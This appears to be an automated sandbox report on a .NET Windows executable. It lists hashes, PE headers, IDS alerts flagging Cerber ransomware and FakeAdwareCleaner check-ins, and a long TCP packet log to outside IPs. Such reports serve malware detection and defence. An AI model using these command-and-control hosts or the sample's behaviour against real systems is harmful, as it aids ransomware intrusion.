                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):7.929205887513412
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                            File name:bpkAAJptGv.exe
                                                                                                                                                            File size:152064
                                                                                                                                                            MD5:d197fad90535fb974db139537a091a5b
                                                                                                                                                            SHA1:5529175952d3fa0697124260e46ec1dbd0c63ae7
                                                                                                                                                            SHA256:a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6
                                                                                                                                                            SHA512:1d43209ee1d950a433b08a05a23c69f88b376db3f52f29c84301d5235febda52a37c690abec96c2dfd63d4917b731b5544a548ce1490d9cf36aba9a031bac35d
                                                                                                                                                            SSDEEP:3072:Gs6dE9I6+dZXlX1sZhuJHxleadYgJcuFsdazXflJv:GYpC16C6adXcFcz
                                                                                                                                                            TLSH:5EE312066D5DDD27EDE901FEA003E2119714EBA1A3D3EBDD2C8EA0542F137B21907A57
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........."......H...........f... ........@.. ....................................`................................
                                                                                                                                                            Icon Hash:00828e8e8686b000
                                                                                                                                                            Entrypoint:0x42661e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x601F1284 [Sat Feb 6 22:04:52 2021 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                            Instruction
                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x265d00x4b.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x566.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x20000x246240x24800False0.9701412671232876data7.958847217230676IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0x280000x5660x600False0.408203125data3.9657132211361437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .reloc0x2a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                            RT_VERSION0x280a00x2dcdata
                                                                                                                                                            RT_MANIFEST0x2837c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            DLLImport
                                                                                                                                                            mscoree.dll_CorExeMain
                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            192.168.2.693.107.12.06323068932023614 09/29/22-14:46:14.805892UDP2023614ET TROJAN Ransomware/Cerber Checkin M3 (3)632306893192.168.2.693.107.12.0
                                                                                                                                                            192.168.2.6185.53.177.5349811802809804 09/29/22-14:46:27.973801TCP2809804ETPRO MALWARE FakeAdwareCleaner.A Checkin4981180192.168.2.6185.53.177.53
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Sep 29, 2022 14:44:33.017252922 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017607927 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017658949 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017699957 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017733097 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017772913 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017772913 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017797947 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017848015 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.017941952 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.041676044 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.041716099 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.041812897 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.041832924 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.041990042 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042073011 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042088032 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042144060 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042179108 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042402983 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042424917 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042593956 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042748928 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042835951 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.042859077 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.043009996 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.043029070 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.043042898 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.043057919 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.043148994 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:33.043190956 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.043276072 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.043291092 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.137079954 CEST44349702131.253.33.200192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:33.137255907 CEST49702443192.168.2.6131.253.33.200
                                                                                                                                                            Sep 29, 2022 14:44:38.751765013 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:38.751864910 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:38.751961946 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:38.785435915 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:38.785484076 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:38.850487947 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:38.850600004 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:38.917305946 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:38.917344093 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:38.917737961 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:38.958451986 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.033648014 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.033691883 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.051492929 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.051585913 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.051640987 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.060666084 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.060714960 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.060735941 CEST49707443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.060748100 CEST4434970723.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.090102911 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.090168953 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.090275049 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.090672016 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.090691090 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.148262024 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.152090073 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.152124882 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.152745962 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.152755022 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.180202007 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.180310965 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.180385113 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.190418959 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.190471888 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:39.190495014 CEST49708443192.168.2.623.50.105.163
                                                                                                                                                            Sep 29, 2022 14:44:39.190505981 CEST4434970823.50.105.163192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.126403093 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.126457930 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.126550913 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.164403915 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.164448023 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.212120056 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.212261915 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.218554020 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.218595028 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.218978882 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.333729982 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.648030996 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.648080111 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.668080091 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.668188095 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.668266058 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.668308020 CEST44349709140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.671288013 CEST49709443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:42.714971066 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.715028048 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.715120077 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.715632915 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.715656042 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.763407946 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.763612032 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.767435074 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.767483950 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.767847061 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.769558907 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.769632101 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.786988974 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787115097 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787177086 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787231922 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787286043 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787341118 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787445068 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.787466049 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787489891 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787625074 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.787645102 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787693024 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.787846088 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.787862062 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.788494110 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.788570881 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.788599014 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.791958094 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.792114973 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.792151928 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.792232037 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.792294979 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.792315006 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.803493977 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.803520918 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.803607941 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.803661108 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.803683996 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.806255102 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.806288004 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.806391001 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.806418896 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.806442976 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.807903051 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.807925940 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.808012009 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.808070898 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.808095932 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.810235023 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.810309887 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.810343027 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.810388088 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.810421944 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.818905115 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.818968058 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.819103003 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.819129944 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.820260048 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.820308924 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.820694923 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.820694923 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.820724964 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.821228027 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.821270943 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.821338892 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.821361065 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.821388006 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.822158098 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.822216034 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.822268963 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.822289944 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.822309971 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.823852062 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.823894978 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.823961973 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.823982954 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.824008942 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.824394941 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.824445963 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.824491024 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.824508905 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.824554920 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.824955940 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.825342894 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.825356960 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.825407982 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.825443983 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.825459003 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.825483084 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.826328993 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.826375961 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.826430082 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.826451063 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.826472998 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.827445984 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.833281994 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.833322048 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.833406925 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.833424091 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.833481073 CEST49710443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:42.834558964 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.834625959 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.834708929 CEST44349710185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:42.834764957 CEST49710443192.168.2.6185.199.110.133
